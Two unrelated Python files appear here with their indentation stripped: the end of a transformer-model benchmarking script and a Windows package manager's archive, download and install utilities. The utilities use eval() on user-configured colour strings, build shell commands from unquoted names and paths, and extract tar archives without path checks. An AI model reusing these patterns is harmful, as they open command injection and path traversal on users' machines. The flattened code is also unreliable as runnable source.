dictionary[model_name] = {"bs": batch_sizes, "ss": slice_sizes, "results": {}}
dictionary[model_name]["results"] = {i: {} for i in batch_sizes}
print("Using model", model)
@tf.function
def inference(inputs):
return model(inputs)
for batch_size in batch_sizes:
for slice_size in slice_sizes:
if max_input_size is not None and slice_size > max_input_size:
dictionary[model_name]["results"][batch_size][slice_size] = "N/A"
else:
sequence = tf.stack(
[tf.squeeze(tf.constant(tokenized_sequence[:slice_size])[None, :])] * batch_size
)
try:
print("Going through model with sequence of shape", sequence.shape)
# To make sure that the model is traced + that the tensors are on the appropriate device
inference(sequence)
runtimes = timeit.repeat(lambda: inference(sequence), repeat=average_over, number=3)
average_time = sum(runtimes) / float(len(runtimes)) / 3.0
dictionary[model_name]["results"][batch_size][slice_size] = average_time
except tf.errors.ResourceExhaustedError as e:
print("Doesn't fit on GPU.", e)
dictionary[model_name]["results"][batch_size][slice_size] = "N/A"
return dictionary
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--models",
required=False,
type=str,
default="all",
help="Model checkpoints to be provided "
"to the AutoModel classes. Leave "
"blank to benchmark the base version "
"of all available model "
"architectures.",
)
parser.add_argument(
"--torch", required=False, action="store_true", help="Benchmark the Pytorch version of the " "models"
)
parser.add_argument(
"--torch_cuda", required=False, action="store_true", help="Pytorch only: run on available " "cuda devices"
)
parser.add_argument(
"--torchscript",
required=False,
action="store_true",
help="Pytorch only: trace the models " "using torchscript",
)
parser.add_argument(
"--tensorflow",
required=False,
action="store_true",
help="Benchmark the TensorFlow version "
"of the models. Will run on GPU if "
"the correct dependencies are "
"installed",
)
parser.add_argument("--xla", required=False, action="store_true", help="TensorFlow only: use XLA acceleration.")
parser.add_argument(
"--amp",
required=False,
action="store_true",
help="TensorFlow only: use automatic mixed precision acceleration.",
)
parser.add_argument(
"--fp16", required=False, action="store_true", help="PyTorch only: use FP16 to accelerate inference."
)
parser.add_argument(
"--keras_predict",
required=False,
action="store_true",
help="Whether to use model.predict " "instead of model() to do a " "forward pass.",
)
parser.add_argument("--save_to_csv", required=False, action="store_true", help="Save to a CSV file.")
parser.add_argument(
"--csv_filename", required=False, default=None, help="CSV filename used if saving results to csv."
)
parser.add_argument(
"--average_over", required=False, default=30, type=int, help="Times an experiment will be run."
)
args = parser.parse_args()
if args.models == "all":
args.models = [
"gpt2",
"bert-base-cased",
"xlnet-base-cased",
"xlm-mlm-en-2048",
"transfo-xl-wt103",
"openai-gpt",
"distilbert-base-uncased",
"distilgpt2",
"roberta-base",
"ctrl",
]
else:
args.models = args.models.split()
print("Running with arguments", args)
if args.torch:
if is_torch_available():
create_setup_and_compute(
model_names=args.models,
tensorflow=False,
gpu=args.torch_cuda,
torchscript=args.torchscript,
fp16=args.fp16,
save_to_csv=args.save_to_csv,
csv_filename=args.csv_filename,
average_over=args.average_over,
)
else:
raise ImportError("Trying to run a PyTorch benchmark but PyTorch was not found in the environment.")
if args.tensorflow:
if is_tf_available():
create_setup_and_compute(
model_names=args.models,
tensorflow=True,
xla=args.xla,
amp=args.amp,
save_to_csv=args.save_to_csv,
csv_filename=args.csv_filename,
average_over=args.average_over,
)
else:
raise ImportError("Trying to run a TensorFlow benchmark but TensorFlow was not found in the environment.")
if __name__ == "__main__":
main()
|
src/zip_utils.py | TheBossProSniper/electric-windows | 210 | 12740204 | from subprocess import PIPE, Popen
from colorama import Fore, Style
import os
import winreg
from Classes.Metadata import Metadata
from Classes.PortablePacket import PortablePacket
from extension import write
home = os.path.expanduser('~')
def delete_start_menu_shortcut(shortcut_name):
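    # Remove the shortcut Electric created under the Start Menu's Electric folder.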
start_menu = os.environ['APPDATA'] + \
R'\Microsoft\Windows\Start Menu\Programs\Electric'
path = os.path.join(start_menu, f'{shortcut_name}.lnk')
os.remove(path)
def unzip_file(download_dir: str, unzip_dir_name: str, file_type: str, metadata: Metadata):
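    # Extract a downloaded .zip, .tar, .tar.gz, .7z or .rar archive into ~/electric, delete the archive, and return the extraction directory.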
import zipfile
import tarfile
if not unzip_dir_name:
unzip_dir_name = download_dir.replace('.zip', '')
if not os.path.isdir(rf'{home}\electric'):
os.mkdir(rf'{home}\electric')
os.chdir(rf'{home}\electric')
if metadata.silent and file_type == '.zip':
with zipfile.ZipFile(download_dir, 'r') as zf:
try:
zf.extractall(download_dir.replace('.zip', ''))
except:
pass
if not metadata.silent and file_type == '.zip':
from tqdm import tqdm
with zipfile.ZipFile(download_dir, 'r') as zf:
for member in tqdm(zf.infolist(), desc='Extracting ', bar_format='{l_bar}{bar:13}{r_bar}{bar:-13b}', smoothing=0.0, unit='files'):
try:
zf.extract(member, download_dir.replace('.zip', ''))
except zipfile.error:
pass
if file_type == '.tar':
tar = tarfile.open(download_dir, 'r:')
tar.extractall(unzip_dir_name)
tar.close()
if file_type == '.tar.gz':
tar = tarfile.open(download_dir, 'r:gz')
tar.extractall(unzip_dir_name)
tar.close()
import py7zr
if file_type == '.7z':
with py7zr.SevenZipFile(download_dir) as z:
z.extractall(unzip_dir_name)
import patoolib
if file_type == '.rar':
patoolib.extract_archive(download_dir, outdir=unzip_dir_name)
os.remove(download_dir)
return rf'{home}\electric\\' + download_dir.replace(file_type, '')
def install_font(src_path: str):
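    # Install a font system-wide: copy it to the Windows Fonts folder, load it with AddFontResourceW, broadcast WM_FONTCHANGE to running programs, and register it under the Fonts registry key.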
from ctypes import wintypes
import ctypes
import os
import shutil
user32 = ctypes.WinDLL('user32', use_last_error=True)
gdi32 = ctypes.WinDLL('gdi32', use_last_error=True)
FONTS_REG_PATH = r'Software\Microsoft\Windows NT\CurrentVersion\Fonts'
HWND_BROADCAST = 0xFFFF
SMTO_ABORTIFHUNG = 0x0002
WM_FONTCHANGE = 0x001D
GFRI_DESCRIPTION = 1
GFRI_ISTRUETYPE = 3
if not hasattr(wintypes, 'LPDWORD'):
wintypes.LPDWORD = ctypes.POINTER(wintypes.DWORD)
user32.SendMessageTimeoutW.restype = wintypes.LPVOID
user32.SendMessageTimeoutW.argtypes = (
wintypes.HWND, # hWnd
wintypes.UINT, # Msg
wintypes.LPVOID, # wParam
wintypes.LPVOID, # lParam
wintypes.UINT, # fuFlags
wintypes.UINT, # uTimeout
wintypes.LPVOID # lpdwResult
)
gdi32.AddFontResourceW.argtypes = (
wintypes.LPCWSTR,) # lpszFilename
# http://www.undocprint.org/winspool/getfontresourceinfo
gdi32.GetFontResourceInfoW.argtypes = (
wintypes.LPCWSTR, # lpszFilename
wintypes.LPDWORD, # cbBuffer
wintypes.LPVOID, # lpBuffer
wintypes.DWORD) # dwQueryType
# copy the font to the Windows Fonts folder
dst_path = os.path.join(
os.environ['SystemRoot'], 'Fonts', os.path.basename(src_path)
)
shutil.copy(src_path, dst_path)
# load the font in the current session
if not gdi32.AddFontResourceW(dst_path):
os.remove(dst_path)
raise WindowsError('AddFontResource failed to load "%s"' % src_path)
# notify running programs
user32.SendMessageTimeoutW(
HWND_BROADCAST, WM_FONTCHANGE, 0, 0, SMTO_ABORTIFHUNG, 1000, None
)
# store the fontname/filename in the registry
filename = os.path.basename(dst_path)
fontname = os.path.splitext(filename)[0]
# try to get the font's real name
cb = wintypes.DWORD()
if gdi32.GetFontResourceInfoW(
filename, ctypes.byref(cb), None, GFRI_DESCRIPTION
):
buf = (ctypes.c_wchar * cb.value)()
if gdi32.GetFontResourceInfoW(
filename, ctypes.byref(cb), buf, GFRI_DESCRIPTION
):
fontname = buf.value
is_truetype = wintypes.BOOL()
cb.value = ctypes.sizeof(is_truetype)
gdi32.GetFontResourceInfoW(
filename, ctypes.byref(cb), ctypes.byref(is_truetype), GFRI_ISTRUETYPE
)
if is_truetype:
fontname += ' (TrueType)'
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE, FONTS_REG_PATH, 0, winreg.KEY_SET_VALUE
) as key:
winreg.SetValueEx(key, fontname, 0, winreg.REG_SZ, filename)
def get_character_color(fill, metadata):
if fill:
try:
fill_char_color = metadata.settings.raw_dictionary[
'customProgressBar']['fill_character_color']
except:
return 'Fore.RESET'
return f'Fore.{fill_char_color.upper()}'if fill_char_color else 'Fore.RESET'
else:
try:
unfill_char_color = metadata.settings.raw_dictionary[
'customProgressBar']['unfill_character_color']
except:
return 'Fore.RESET'
return f'Fore.{unfill_char_color.upper()}' if unfill_char_color else 'Fore.RESET'
def get_init_char(start, metadata) -> str:
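    # Return the configured start or end character for a custom progress bar, or an empty string when none is set.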
if metadata.settings.use_custom_progress_bar:
if start:
try:
start_char = Fore.RESET + \
metadata.settings.raw_dictionary['customProgressBar']['start_character']
except:
return ''
return start_char or ''
else:
try:
end_char = Fore.RESET + \
metadata.settings.raw_dictionary['customProgressBar']['end_character']
except:
return ''
return end_char or ''
return ''
def download(packet, url: str, download_extension: str, file_path: str, metadata: Metadata, show_progress_bar=True, is_zip=False):
    '''
    Downloads a file from a URL and saves it to a location.
    packet `(PortablePacket)`: The packet being installed; used to create its extras directory for non-zip downloads.
    url `(str)`: Link or URL to download the file from.
    download_extension `(str)`: Extension for the downloaded file, like `.exe` or `.zip`.
    file_path `(str)`: Path (without the extension) to save the file to.
    Examples(`'C:\\Users\\name\\Downloads'`, `'~/Desktop'`)
    metadata `(Metadata)`: Run metadata controlling progress bar and output behaviour.
    show_progress_bar `[Optional]` `(bool)`: Whether or not to show the progress bar while downloading.
    >>> download(packet, 'https://atom.io/download/windows_x64', '.exe', 'C:\\MyDir\\Installer', metadata)
    '''
import requests
import sys
import cursor
cursor.hide() # Use This If You Want to Hide The Cursor While Downloading The File In The Terminal
if not os.path.isdir(rf'{home}\electric'):
os.mkdir(rf'{home}\electric')
if not is_zip:
if not os.path.isdir(rf'{home}\electric\extras'):
os.mkdir(rf'{home}\electric\extras')
if not os.path.isdir(rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}'):
os.mkdir(
rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}')
try:
file_path = file_path.replace('\\\\', '\\')
with open(f'{file_path}{download_extension}', 'wb') as f:
# Get Response From URL
response = requests.get(url, stream=True)
# Find Total Download Size
total_length = response.headers.get('content-length')
# Number Of Iterations To Write To The File
chunk_size = 4096
if total_length is None:
f.write(response.content)
else:
dl = 0
full_length = int(total_length)
progress_type = metadata.settings.progress_bar_type
# Write Data To File
for data in response.iter_content(chunk_size=chunk_size):
dl += len(data)
f.write(data)
# if no_progress is True or show_progress_bar (user settings) is false
if metadata.no_progress == True or metadata.settings.show_progress_bar == False:
sys.stdout.write(
f'\r{round(dl / 1000000, 1)} Mb / {round(full_length / 1000000, 1)} Mb')
sys.stdout.flush()
if show_progress_bar:
# print the progress bar
if not metadata.no_progress and not metadata.silent:
complete = int(30 * dl / full_length)
fill_c = '-' # Fallback Character
unfill_c = ' ' # Fallback Character
if progress_type == 'custom' or metadata.settings.use_custom_progress_bar:
fill_c = eval(get_character_color(
True, metadata)) + metadata.settings.raw_dictionary['customProgressBar']['fill_character'] * complete
unfill_c = eval(get_character_color(
False, metadata)) + metadata.settings.raw_dictionary['customProgressBar']['unfill_character'] * (30 - complete)
elif progress_type == 'accented':
fill_c = Fore.LIGHTBLACK_EX + Style.DIM + '█' * complete
unfill_c = Fore.BLACK + '█' * (30 - complete)
elif progress_type == 'zippy':
fill_c = Fore.LIGHTGREEN_EX + '=' * complete
unfill_c = Fore.LIGHTBLACK_EX + \
'-' * (30 - complete)
elif progress_type not in ['custom', 'accented', 'zippy'] and metadata.settings.use_custom_progress_bar == False or progress_type == 'default':
fill_c = Fore.LIGHTBLACK_EX + Style.DIM + '█' * complete
unfill_c = Fore.BLACK + '█' * (30 - complete)
if metadata.settings.electrify_progress_bar == True and not metadata.settings.use_custom_progress_bar:
sys.stdout.write(
f'\r{fill_c}{unfill_c} {Fore.RESET + Style.DIM} ⚡ {round(dl / 1000000, 1)} / {round(full_length / 1000000, 1)} Mb {Fore.RESET}⚡')
else:
sys.stdout.write(
f'\r{get_init_char(True, metadata)}{fill_c}{unfill_c}{get_init_char(False, metadata)} {Fore.RESET + Style.DIM} {round(dl / 1000000, 1)} / {round(full_length / 1000000, 1)} MB {Fore.RESET}')
sys.stdout.flush()
if is_zip:
write(f'\n{Fore.LIGHTGREEN_EX}Initializing Unzipper{Fore.RESET}',
'white', metadata)
except KeyboardInterrupt:
write(f'\nDownload Was Interrupted!',
'red', metadata)
sys.exit()
def verify_checksum(path: str, checksum: str, metadata: Metadata, newline=False):
import hashlib
if hashlib.sha256(open(path, 'rb').read()).hexdigest().upper() == checksum:
if not newline:
write('Verified Installer Hash', 'bright_green', metadata)
else:
write('\nVerified Installer Hash', 'bright_green', metadata)
else:
write('Hashes Don\'t Match!', 'bright_green', metadata)
if not metadata.yes:
continue_installation = confirm(
'Would you like to continue with installation?')
if continue_installation:
return
else:
os._exit(1)
def create_start_menu_shortcut(unzip_dir, file_name, shortcut_name):
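    # Create the Electric folder in the Start Menu if needed and add a shortcut pointing at the extracted executable.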
import win32com.client
start_menu = os.environ['APPDATA'] + \
R'\Microsoft\Windows\Start Menu\Programs\Electric'
if not os.path.isdir(start_menu):
os.mkdir(start_menu)
path = os.path.join(start_menu, f'{shortcut_name}.lnk')
os.chdir(unzip_dir)
icon = unzip_dir + '\\' + file_name
shell = win32com.client.Dispatch("WScript.Shell")
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = icon
shortcut.IconLocation = icon
shortcut.WindowStyle = 7 # 7 - Minimized, 3 - Maximized, 1 - Normal
shortcut.save()
def generate_shim(shim_command: str, shim_name: str, shim_extension: str, overridefilename: str = ''):
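    # Write a .bat shim in ~/electric/shims that forwards all arguments to the target executable.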
shim_command += f'\\{shim_name}'
if not os.path.isdir(rf'{home}\electric\shims'):
os.mkdir(rf'{home}\electric\shims')
with open(rf'{home}\electric\shims\{shim_name if not overridefilename else overridefilename}.bat', 'w+') as f:
shim_command = shim_command.replace('\\\\', '\\')
f.write(f'@echo off\n"{shim_command}.{shim_extension}" %*')
def find_existing_installation(dir_name: str) -> bool:
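    # Return True if an entry with this name already exists under ~/electric.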
loc = f'{home}\electric'
files = os.listdir(loc)
return dir_name in files
def display_notes(packet: PortablePacket, unzip_dir: str, metadata: Metadata, uninstall=False):
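    # Print the packet's install or uninstall notes, substituting the $dir and <extras> placeholders with real paths.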
write('\n----Notes----', 'white', metadata)
if (
not uninstall
and isinstance(packet.install_notes, list)
or uninstall
and isinstance(packet.uninstall_notes, list)
):
for line in packet.notes:
write(line.replace('$dir', unzip_dir).replace('<extras>', rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}').replace(
'\\\\', '\\'), 'white', metadata)
elif not uninstall:
write(packet.install_notes.replace('$dir', unzip_dir).replace('<extras>', rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}').replace(
'\\\\', '\\'), 'white', metadata)
else:
write(packet.uninstall_notes.replace(
'$dir', unzip_dir).replace('<extras>', rf'{home}\electric\extras\{packet.extract_dir}@{packet.latest_version}').replace('\\\\', '\\'), 'white', metadata)
print('\n')
def make_archive(source, destination):
    from shutil import make_archive as shutil_make_archive, move
base = os.path.basename(destination)
name = base.split('.')[0]
format = base.split('.')[1]
archive_from = os.path.dirname(source)
archive_to = os.path.basename(source.strip(os.sep))
    # call shutil's make_archive explicitly; the local name would otherwise shadow it and recurse
    shutil_make_archive(name, format, archive_from, archive_to)
move('%s.%s' % (name, format), destination)
def create_folder_backup(packet: PortablePacket, folder: str):
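    # Archive the given folder from the package's install directory and copy it into ~/electric\Backup.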
from shutil import copytree
if not os.path.isdir(rf'{home}\electric\Backup'):
os.mkdir(rf'{home}\electric\Backup')
os.mkdir(
rf'{home}\electric\Backup\{packet.extract_dir}@{packet.latest_version}')
make_archive(rf'{home}\electric\{packet.extract_dir}@{packet.latest_version}\{folder}',
rf'{home}\electric\{packet.extract_dir}@{<EMAIL>}')
copytree(rf'{home}\electric\{packet.extract_dir}@{packet.latest_version}\{folder}',
rf'{home}\electric\Backup\{packet.extract_dir}@{packet.latest_version}\{folder}.zip')
def set_environment_variable(name: str, value: str):
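    # Persist a user environment variable with setx; a trailing backslash is doubled so it does not escape the closing quote.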
if value.endswith('\\'):
value += '\\'
Popen(rf'setx {name} "{value}"', stdin=PIPE,
stdout=PIPE, stderr=PIPE, shell=True)
def delete_environment_variable(name: str):
Popen(rf'reg delete "HKCU\Environment" /F /V "{name}"', stdin=PIPE,
stdout=PIPE, stderr=PIPE, shell=True)
def confirm(prompt: str):
value = input(f'{prompt} (Y/n): ')
return value in ['y', 'yes', 'Y', 'YES', 'Yes']
def install_dependencies(packet: PortablePacket, metadata: Metadata):
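    # List the packet's dependencies and, if the user confirms, install each one through the electric CLI.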
disp = str(packet.dependencies).replace(
"[", "").replace("]", "").replace("\'", "")
write(f'{packet.display_name} has the following dependencies: {disp}',
'bright_yellow', metadata)
continue_install = confirm(
'Would you like to install the above dependencies ?')
if continue_install:
write(
f'Installing Dependencies For => {packet.display_name}', 'cyan', metadata)
for package_name in packet.dependencies:
os.system(f'electric install {package_name}')
def uninstall_dependencies(packet: PortablePacket, metadata: Metadata):
disp = str(packet.dependencies).replace(
"[", "").replace("]", "").replace("\'", "")
write(f'{packet.display_name} has the following dependencies: {disp}',
'bright_yellow', metadata)
continue_install = confirm(
'Would you like to uninstall the above dependencies ?')
if continue_install:
write(
f'Uninstalling Dependencies For => {packet.display_name}', 'cyan', metadata)
for package_name in packet.dependencies:
os.system(f'electric uninstall {package_name}')
def append_to_path(input_dir: str):
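    # Append the given directory to the machine-wide PATH using setx /M.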
proc = Popen(f'setx /M path "%PATH%;{input_dir}"', stdin=PIPE,
stdout=PIPE, stderr=PIPE, shell=True)
_, _ = proc.communicate()
|